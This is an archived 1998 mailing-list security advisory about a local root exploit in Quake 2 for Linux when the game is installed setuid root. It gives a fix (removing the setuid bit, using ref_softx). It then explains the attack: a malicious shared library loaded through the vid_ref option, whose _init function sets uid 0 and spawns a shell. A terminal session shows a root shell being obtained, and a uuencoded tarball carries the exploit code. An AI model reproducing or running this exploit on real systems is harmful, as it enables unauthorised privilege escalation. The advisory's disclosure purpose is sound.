Quake 2 Linux

From: kevingeoat_private
Date: Sun Jan 25 1998 - 22:16:37 PST


    Vulnerable:
    Anyone who made Quake2 setuid root in order to use the svgalib software refresh.
    
    Solution:
    chmod u-s quake2, and use ref_softx instead of ref_soft.
    If you prefer console-based video, you could get GGI
    (http://synergy.caltech.edu/~ggi/), and use KGI with the SVGAlib wrapper
    (I haven't tried this).
    
    
    Exploit:
    Quake2 uses dlopen(3) to load its graphics code (which is in a separate
    shared library).  dlopen calls the _init function (if applicable) before
    it returns.  Quake2 allows you to set which refresh driver to use on the
    command line, and loads the .so file from the working directory.
    The exploit is a shared library with one function, _init.  It sets the uid
    and gid to 0, and spawns a shell.
    
    
    nop@chrome:~/ref_root> id
    uid=501(nop) gid=100(users) groups=100(users)
    nop@chrome:~/ref_root> make
    gcc -O2 -pipe -o ref_root.o -c ref_root.c -fPIC
    ld -m elf_i386 -shared -o ref_root.so -soname ref_root
    /usr/lib/crtbeginS.o ref_root.o /usr/lib/crtendS.o
    nop@chrome:~/ref_root> /usr/games/quake/quake2 +set vid_ref root
    couldn't exec default.cfg
    couldn't exec config.cfg
    Console initialized.
    ------- Loading ref_root.so -------
    sh-2.00#
    sh-2.00# id
    uid=0(root) gid=0(root) groups=100(users)
    sh-2.00#
    
    exploit code follows.
    begin 644 ref_root.tgz
    M'XL(`/TBS#0``^W534_C,!`&X%[K7_$*+FW5$"<IH2V[7#BL5K`+$N*T0E7J
    M3!.+X)1\(!#BOZ_3!5K0"D[E2_-<8L],;"?1*+^B<YKIC%IKY$D9#@9HH2&?
    M7:T@#(%P$`;2V[$`3X8R:$&N\U`/ZK**"J!5Y'GU4MUK^4\JRK(Q"II-FN=#
    MIJ="/,S&$.U$*3A'/IRYGA.<_+%T*X>CEC-;-3O^N0\A[!+CU2JW+@O7!EU5
    M5&3BDV>A*27:V*!H9S&<"U`VF^A@&,(ITZB@^,F>I=VTS$UT0<LC_V^QE_<7
    M0KSW6_\XEE]P?7N\VO_;P7W_^](?2-O_GMS9YOY_"VYOV4J=R]K^#7S0]3S+
    M==6%RN<WA4Y2FU)=>*/1$`=TI0U^4%XDA)XKQ*8V*JMCPK?:Z+**M]*]E9@-
    MV-YK8D*;"A-M=-7IXE9`V?9&KTS_^&>[0L`.Y!F^8\.=:N.6Z<;N(N8UL=^G
    MAX?-E*I:QQW9_3=.5L;TF*!K4E?462S7MROT%W?;S!TW/6.,,<888XPQQAAC
    3C#'&&&.,,<:^IK\_JS?9`"@``%?4
    `
    end
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:41:02 PDT